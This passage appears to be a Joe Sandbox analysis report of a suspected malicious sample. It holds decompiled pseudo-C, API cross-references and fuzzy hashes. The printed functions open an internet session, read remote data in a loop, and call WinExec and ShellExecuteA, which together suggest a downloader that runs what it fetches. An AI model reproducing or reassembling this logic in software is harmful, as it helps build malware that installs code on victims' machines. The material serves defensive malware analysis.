0x00401d7b
0x00401d80
0x00401d86
0x00401d88
0x00401d95
0x00401da8
0x00401da8
0x00401db9
0x00401dbb
0x00401dc5
0x00401dcd
0x00401dd5
0x00401ddd
0x00401de3
0x00401e15
0x00401e1a
0x00401e29
0x00401e34
0x00401e35
0x00401e3f
0x00401e47
0x00401e4f
0x00401e55
0x00401e87
0x00401e8c
0x00401e9b
0x00401ea6
0x00401ea7
0x00401eaf
0x00401ebb
0x00401ec0
0x00401ecc
0x00401ed1
0x00401ee5
0x00401ef6
0x00401efb
0x00401f03
0x00401f0d
0x00401f17
0x00401f2c
0x00401f32
0x00401f6a
0x00401f7b
0x00401f7d
0x00401f87
0x00401f99
0x00401f9b
0x00401fa5
0x00401fad
0x00401fb5
0x00401fbd
0x00401ffc
0x00402004
0x00402019
0x00402033
0x0040203a
0x00402042
0x0040204a
0x00402081
0x00402086
0x0040209b
0x004020b5
0x004020c6
0x004020c8
0x004020d2
0x004020e4
0x004020e6
0x004020f0
0x004020fd
0x004020ff
0x00402101
0x00402101
0x00402112
0x00402114
0x0040211e
0x0040212a
0x00402135
0x00402140
0x0040214b
0x00402156
0x00402161
0x0040216c
0x00402177
0x00402182
0x0040218d
0x00402198
0x0040219d
0x004021a1
0x004021ae

APIs

Part of subcall function 00406D10: GetSystemInfo.KERNELBASE(?), ref: 00406D36

task.LIBCPMTD ref: 004013D7

Part of subcall function 00402F60: task.LIBCPMTD ref: 0040303C

Part of subcall function 00402D30: __allrem.LIBCMT ref: 00402DA3
Part of subcall function 00402D30: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00402DC0
Part of subcall function 00402D30: task.LIBCPMTD ref: 00402DD6

task.LIBCPMTD ref: 00401A8B
task.LIBCPMTD ref: 00401A96

Part of subcall function 0041CEE0: allocator.LIBCPMTD ref: 0041CF29
Part of subcall function 0041CEE0: task.LIBCPMTD ref: 0041CFA2

Part of subcall function 004022A0: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00402311
Part of subcall function 004022A0: task.LIBCPMTD ref: 00402327
Part of subcall function 004022A0: task.LIBCPMTD ref: 0040232F
Part of subcall function 004022A0: task.LIBCPMTD ref: 00402337

task.LIBCPMTD ref: 00401AF0

Part of subcall function 004062A0: char_traits.LIBCPMTD ref: 004062B5

Part of subcall function 00402E60: task.LIBCPMTD ref: 00402ECF
Part of subcall function 00402E60: task.LIBCPMTD ref: 00402ED7

Part of subcall function 00402E60: task.LIBCPMTD ref: 00402F49
Part of subcall function 00402E60: task.LIBCPMTD ref: 00402F51

Part of subcall function 00406BB0: ShellExecuteA.SHELL32(?,?,?,?,?,?), ref: 00406C3D

Part of subcall function 00406350: char_traits.LIBCPMTD ref: 0040635A

Part of subcall function 00406E20: WinExec.KERNEL32(?,?), ref: 00406E5B

Part of subcall function 00406DD0: WinExec.KERNEL32(?,?), ref: 00406E0B

task.LIBCPMTD ref: 0040212A
task.LIBCPMTD ref: 00402135
task.LIBCPMTD ref: 00402140
task.LIBCPMTD ref: 0040214B
task.LIBCPMTD ref: 00402156
task.LIBCPMTD ref: 00402161
task.LIBCPMTD ref: 0040216C
task.LIBCPMTD ref: 00402177
task.LIBCPMTD ref: 00402198

Part of subcall function 00403250: task.LIBCPMTD ref: 004033B4
Part of subcall function 00403250: task.LIBCPMTD ref: 004033BF
Part of subcall function 00403250: task.LIBCPMTD ref: 004033CA

Strings

open, xrefs: 00401F58

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$Concurrency::task_continuation_context::task_continuation_contextExecchar_traits$ExecuteInfoShellSystem__allremallocator
String ID: open
API String ID: 1834972892-2758837156
Opcode ID: 6429ed8e0b19ea6fe0b6e2942b73c01b3033471f9f0f9a11022cf6b5ddeb233f
Instruction ID: 2d426cd882a3f24a23ecae19cdbaa086e56fc997fbf61f033f6d478bec0d85f8
Opcode Fuzzy Hash: 6429ed8e0b19ea6fe0b6e2942b73c01b3033471f9f0f9a11022cf6b5ddeb233f
Instruction Fuzzy Hash: 8292A172A151684AEB25D7798C51BEEB7B6AF95304F0480FEA04DE2183EE384FC48F55

Uniqueness

Uniqueness Score: -1.00%

Function 004295D4 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004295D4(int _a4) {
				void* _t14;

				if(E00432684(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00429659(_t14, _a4);
				ExitProcess(_a4);
			}

0x004295e1
0x004295fd
0x004295fd
0x00429606
0x0042960f

APIs

GetCurrentProcess.KERNEL32(00000002,?,004295D3,00000003,0042976E,00000002,00000003,00000002,00000000), ref: 004295F6
TerminateProcess.KERNEL32(00000000,?,004295D3,00000003,0042976E,00000002,00000003,00000002,00000000), ref: 004295FD
ExitProcess.KERNEL32 ref: 0042960F

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7a241a52655954db34467d3afe2556f7001e16e38c2ce946ecd3c99099a6852f
Instruction ID: d460f139f991a9c89094e332fbe79cfbf608fc5c9aea7a9126aee00ad1661970
Opcode Fuzzy Hash: 7a241a52655954db34467d3afe2556f7001e16e38c2ce946ecd3c99099a6852f
Instruction Fuzzy Hash: AFE0B635104118AFCB116F95FD49B593BA9FB56346F44042AFA0986231CB79DD91CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004065C0 Relevance: 1.5, APIs: 1, Instructions: 41
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				DWORD* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;

				_v28 = __ecx;
				_v24 = E0040DE00(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a16)));
				_v12 =  *((intOrPtr*)(E004075F0(_a12)));
				_v16 = E004075F0(_a8);
				_v20 =  *((intOrPtr*)(E004075F0(_a4)));
				return InternetReadFile(_v20, _v16, _v12, _v8);
			}

0x004065c6
0x004065ce
0x004065df
0x004065f0
0x004065ff
0x00406610
0x00406629

APIs

InternetReadFile.WININET(?,?,?,?), ref: 00406623

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 1ff112532b50561e3b30c92ec8dc4951b3b4e4f29b315a588da86059721ed5d5
Instruction ID: bec4a0f11ed7b1e0c4601c7e52512cc5a501e2720ddba748902a490d85e73bc2
Opcode Fuzzy Hash: 1ff112532b50561e3b30c92ec8dc4951b3b4e4f29b315a588da86059721ed5d5
Instruction Fuzzy Hash: A901E1F9D04208AFCF04DFA5D84189F7BB5AF48304F14456DF509A7342E635EA10DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00407000 Relevance: 1.5, APIs: 1, Instructions: 26
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407000(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAA* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E0040F590(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a8)));
				_v12 =  *((intOrPtr*)(E004075F0(_a4)));
				return FindFirstFileA(_v12, _v8);
			}

0x00407006
0x0040700e
0x0040701f
0x00407030
0x00407041

APIs

FindFirstFileA.KERNELBASE(?,?), ref: 0040703B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: cb63176a0e5c64abf109a10df6631532238008ed28c41900a2b6a8d67113e3ad
Instruction ID: e8d3b32061092963886c8fb1aee812d212dc305cfb2fce228f1be99198851771
Opcode Fuzzy Hash: cb63176a0e5c64abf109a10df6631532238008ed28c41900a2b6a8d67113e3ad
Instruction Fuzzy Hash: 01F0C7B9D04208BFCB04EFA5D84189EBB74EF48304F1085ADF91957741E635E614DB95

Uniqueness

Uniqueness Score: -1.00%

Function 004069A0 Relevance: 1.5, APIs: 1, Instructions: 26
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004069A0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E0040F180(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a8)));
				_v12 =  *((intOrPtr*)(E004075F0(_a4)));
				return CreateToolhelp32Snapshot(_v12, _v8);
			}

0x004069a6
0x004069ae
0x004069bf
0x004069d0
0x004069e1

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?,004031B0,00000002,00000000), ref: 004069DB

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 39bce39c78970f8f1838e1434c97ed7ceb06c8ab581937722428db1b09100dc8
Instruction ID: 0b06035c4b904452770d6960af5363595bb74da6678d3467172e866f5ad1cd85
Opcode Fuzzy Hash: 39bce39c78970f8f1838e1434c97ed7ceb06c8ab581937722428db1b09100dc8
Instruction Fuzzy Hash: 4BF0C0B9D04208BFCB04EFA5D84189EBB74EF4C304F1085AEF919A7341E635AA14DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00406D10 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406D10(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				struct _SYSTEM_INFO* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t9;

				_v16 = __ecx;
				_v12 = E0040F730(__eflags);
				_t9 = E004075F0(_a4);
				_v8 =  *_t9;
				GetSystemInfo(_v8);
				return _t9;
			}

0x00406d16
0x00406d1e
0x00406d25
0x00406d2f
0x00406d36
0x00406d3c

APIs

GetSystemInfo.KERNELBASE(?), ref: 00406D36

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: c235b0fa947351e54708c9c36b337ada1fecf47ca3f9c71a68274bcf656bc65d
Instruction ID: ac1c9d580fd9712c44a0ba8810b689546827f8febebe0efcc49d072dc6dec69c
Opcode Fuzzy Hash: c235b0fa947351e54708c9c36b337ada1fecf47ca3f9c71a68274bcf656bc65d
Instruction Fuzzy Hash: 61E012B9D0430CBFCB00EFE5D44589EBB78AF48304F1081BEE90567341E635AA15DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00425405 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425405() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00425411); // executed
				return _t1;
			}

0x0042540a
0x00425410

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00025411,00424C1A), ref: 0042540A

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8c3fe1f0eea1e66ef44fc4b44ca90eb3ebf1274b6c323635194de36def2236b2
Instruction ID: 4bcefbc3ec0c9c8ad7b7133b327247f15c01b6016c4e78fe01da64d987b75b59
Opcode Fuzzy Hash: 8c3fe1f0eea1e66ef44fc4b44ca90eb3ebf1274b6c323635194de36def2236b2
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004025E0 Relevance: 28.8, APIs: 19, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004025E0(void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				char _v1044;
				char _v1068;
				char _v1092;
				char _v1116;
				char _v1132;
				char _v1148;
				char _v1164;
				char _v1165;
				signed char _v1166;
				signed int _v1167;
				signed char _v1168;
				signed char _v1169;
				signed int _v1170;
				signed char _v1171;
				char _v1172;
				char _v1173;
				char _v1174;
				signed int _v1176;
				signed char _v1177;
				signed int _v1178;
				char _v1179;
				char _v1184;
				char _v1192;
				char _v1196;
				char _v1200;
				char _v1201;
				char _v1202;
				char _v1203;
				char _v1204;
				char _v1205;
				char _v1206;
				char _v1207;
				char _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				char _v1248;
				char _v1252;
				char _v1256;
				char _v1260;
				char _v1264;
				char _v1268;
				char _v1272;
				char _v1276;
				char _v1280;
				char _v1284;
				char _v1288;
				char _v1292;
				char _v1296;
				char _v1300;
				char _v1304;
				char _v1308;
				char _v1312;
				intOrPtr _v1316;
				char _v1320;
				char _v1324;
				char _v1328;
				char _v1332;
				char _v1336;
				char _v1340;
				char _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				char _v1356;
				char _v1360;
				char _v1364;
				char _v1368;
				char _v1372;
				char _v1376;
				void* __ebx;
				signed int _t170;
				char _t178;
				char _t198;
				intOrPtr _t212;
				intOrPtr _t221;
				intOrPtr _t225;
				void* _t331;
				void* _t332;
				void* _t337;
				void* _t344;

				_t344 = __eflags;
				_t332 = __esi;
				_t331 = __edi;
				_t241 = _t337;
				_v8 =  *((intOrPtr*)(_t337 + 4));
				_t335 = (_t337 - 0x00000008 & 0xfffffff0) + 4;
				_t170 =  *0x4c61a4; // 0x8656a166
				_v16 = _t170 ^ (_t337 - 0x00000008 & 0xfffffff0) + 0x00000004;
				_v1300 = 0;
				_v1176 = 0;
				_v1177 = 0;
				_v1178 = 0;
				_v1344 = E0041B420(E004047A0( &_v1132, _v1178 & 0x000000ff, _v1178 & 0x000000ff, _v1177 & 0x000000ff, _v1176 & 0x000000ff), _v1178 & 0x000000ff);
				_v1332 = 0;
				_v1336 = 0;
				_v1340 = 1;
				_t178 = E00406AD0( &_v1203, _t344,  &_v1344,  &_v1340,  &_v1336,  &_v1332,  &_v1300); // executed
				_v1200 = _t178;
				if(_v1200 != 0) {
					_v1216 = E00414F10( &_v1202);
					_v1348 =  *((intOrPtr*)(E0041EEA0(_t241 + 8,  &_v1372)));
					_v1220 = _v1348;
					_v1352 =  *((intOrPtr*)(E0041ADE0(_t241 + 8,  &_v1368)));
					_v1224 = _v1352;
					E00405C00( &_v1092, _v1224, _v1220, _v1216);
					_v1272 = E0041AF80( &_v1092);
					_v1236 = E00414F10( &_v1201);
					_v1228 =  *((intOrPtr*)(E0041EEA0(_t241 + 0x20,  &_v1376)));
					_v1240 = _v1228;
					_v1232 =  *((intOrPtr*)(E0041ADE0(_t241 + 0x20,  &_v1364)));
					_v1244 = _v1232;
					E00405C00( &_v1068, _v1244, _v1240, _v1236);
					_v1292 = E0041AF80( &_v1068);
					_v1248 = 0;
					_v1252 = 0;
					_v1256 = 3;
					_v1260 = 0;
					_v1264 = 0;
					_v1268 = 0x50;
					_t198 = E004064F0( &_v1207, __eflags,  &_v1200,  &_v1272,  &_v1268,  &_v1264,  &_v1260,  &_v1256,  &_v1252,  &_v1248); // executed
					_v1196 = _t198;
					__eflags = _v1196;
					if(_v1196 != 0) {
						_v1166 = 0;
						_v1167 = 0;
						_v1168 = 0;
						_v1360 = E0041B420(E00404720( &_v1148, _v1167 & 0x000000ff, _v1168 & 0x000000ff, _v1167 & 0x000000ff, _v1166 & 0x000000ff), _v1167 & 0x000000ff);
						_v1356 = 0;
						_v1276 = 0;
						_v1169 = 0;
						_v1170 = 0;
						_v1171 = 0;
						_v1296 = E0041B420(E00405A10( &_v1164, _v1170 & 0x000000ff, _v1171 & 0x000000ff, _v1170 & 0x000000ff, _v1169 & 0x000000ff), _v1170 & 0x000000ff);
						_v1280 = 0;
						_v1284 = 0;
						_v1288 = 0;
						_t328 =  &_v1196;
						_v1184 = E00406630( &_v1204, __eflags,  &_v1196,  &_v1296,  &_v1292,  &_v1288,  &_v1284,  &_v1360,  &_v1280,  &_v1276);
						__eflags = _v1184;
						if(__eflags != 0) {
							_v1328 = 0;
							_v1304 = 0;
							_v1308 = 0;
							_v1312 = 0;
							_t328 =  &_v1308;
							_t212 = E00406870( &_v1205, __eflags,  &_v1184,  &_v1312,  &_v1308,  &_v1304,  &_v1328); // executed
							_v1316 = _t212;
							__eflags = _v1316;
							if(_v1316 != 0) {
								E004157E0( &_v1116);
								_v1212 = 1;
								_v1192 = 0xffffffff;
								while(1) {
									__eflags = _v1212;
									if(_v1212 == 0) {
										break;
									}
									__eflags = _v1192;
									if(__eflags != 0) {
										_v1320 =  &_v1192;
										_v1324 = 0x400;
										_t225 = E004065C0( &_v1206, __eflags,  &_v1184,  &_v1044,  &_v1324,  &_v1320); // executed
										_v1212 = _t225;
										_t328 =  &_v1044;
										E0041A810( &_v1116,  &_v1044, _v1192);
										continue;
									}
									break;
								}
								E00416F70( *((intOrPtr*)(_t241 + 0x38)),  &_v1116);
								_v1174 = 1;
								E00416980( &_v1116);
								E00416980( &_v1068);
								E00416980( &_v1092);
								E00416980(_t241 + 8);
								E00416980(_t241 + 0x20);
								_t221 = _v1174;
							} else {
								_v1173 = 0;
								E00416980( &_v1068);
								E00416980( &_v1092);
								E00416980(_t241 + 8);
								E00416980(_t241 + 0x20);
								_t221 = _v1173;
							}
						} else {
							_v1172 = 0;
							E00416980( &_v1068);
							E00416980( &_v1092);
							E00416980(_t241 + 8);
							E00416980(_t241 + 0x20);
							_t221 = _v1172;
						}
					} else {
						_v1165 = 0;
						E00416980( &_v1068);
						E00416980( &_v1092);
						E00416980(_t241 + 8);
						E00416980(_t241 + 0x20);
						_t221 = _v1165;
					}
				} else {
					_v1179 = 0;
					E00416980(_t241 + 8);
					E00416980(_t241 + 0x20);
					_t221 = _v1179;
				}
				return E00424900(_t221, _t241, _v16 ^ _t335, _t328, _t331, _t332);
			}

0x004025e0
0x004025e0
0x004025e0
0x004025e1
0x004025f0
0x004025f4
0x004025fc
0x00402603
0x00402606
0x00402612
0x0040261a
0x00402622
0x00402652
0x00402658
0x00402662
0x0040266c
0x0040269f
0x004026a4
0x004026b1
0x004026e5
0x004026fc
0x00402708
0x0040271f
0x0040272b
0x0040274c
0x0040275c
0x0040276d
0x00402784
0x00402790
0x004027a7
0x004027b3
0x004027d4
0x004027e4
0x004027ea
0x004027f4
0x004027fe
0x00402808
0x00402812
0x0040281c
0x00402864
0x00402869
0x0040286f
0x00402876
0x004028b7
0x004028bf
0x004028c7
0x004028f7
0x004028fd
0x00402907
0x00402913
0x0040291b
0x00402923
0x00402953
0x00402959
0x00402963
0x0040296d
0x004029a8
0x004029ba
0x004029c0
0x004029c7
0x00402a06
0x00402a10
0x00402a1a
0x00402a24
0x00402a3c
0x00402a57
0x00402a5c
0x00402a62
0x00402a69
0x00402aae
0x00402ab3
0x00402abd
0x00402ac7
0x00402ac7
0x00402ace
0x00000000
0x00000000
0x00402ad0
0x00402ad7
0x00402adf
0x00402ae5
0x00402b11
0x00402b16
0x00402b23
0x00402b30
0x00000000
0x00402b30
0x00000000
0x00402ad7
0x00402b41
0x00402b46
0x00402b53
0x00402b5e
0x00402b69
0x00402b71
0x00402b79
0x00402b7e
0x00402a6b
0x00402a6b
0x00402a78
0x00402a83
0x00402a8b
0x00402a93
0x00402a98
0x00402a98
0x004029c9
0x004029c9
0x004029d6
0x004029e1
0x004029e9
0x004029f1
0x004029f6
0x004029f6
0x00402878
0x00402878
0x00402885
0x00402890
0x00402898
0x004028a0
0x004028a5
0x004028a5
0x004026b3
0x004026b3
0x004026bd
0x004026c5
0x004026ca
0x004026ca
0x00402bff

APIs

Part of subcall function 00406AD0: InternetOpenA.WININET(?,?,?,?,?), ref: 00406B4A

task.LIBCPMTD ref: 004026BD
task.LIBCPMTD ref: 004026C5
task.LIBCPMTD ref: 00402885
task.LIBCPMTD ref: 00402890
task.LIBCPMTD ref: 00402898
task.LIBCPMTD ref: 004028A0

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$InternetOpen
String ID:
API String ID: 3973478918-0
Opcode ID: 76bce4edd43ec31f2f534b182a7f5afac0f4051a90436f09d34c3fe019a4284e
Instruction ID: 92db3bf8d338f180781cf5af729abaf91b72c7154752bfde8ce1322bb3cb9abe
Opcode Fuzzy Hash: 76bce4edd43ec31f2f534b182a7f5afac0f4051a90436f09d34c3fe019a4284e
Instruction Fuzzy Hash: 39E1E6F19111688ECB65DF15CC90BEEB7B8AF58304F0441EEE24A66192DB745BC8CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0043980E Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0043980E(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E0043955C(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E004373DF(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E004394C7(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0043732A(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x4c7560 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x4c7560 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E00439274(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x4c7560 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x4c7560 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4c7560 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x4c7560 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
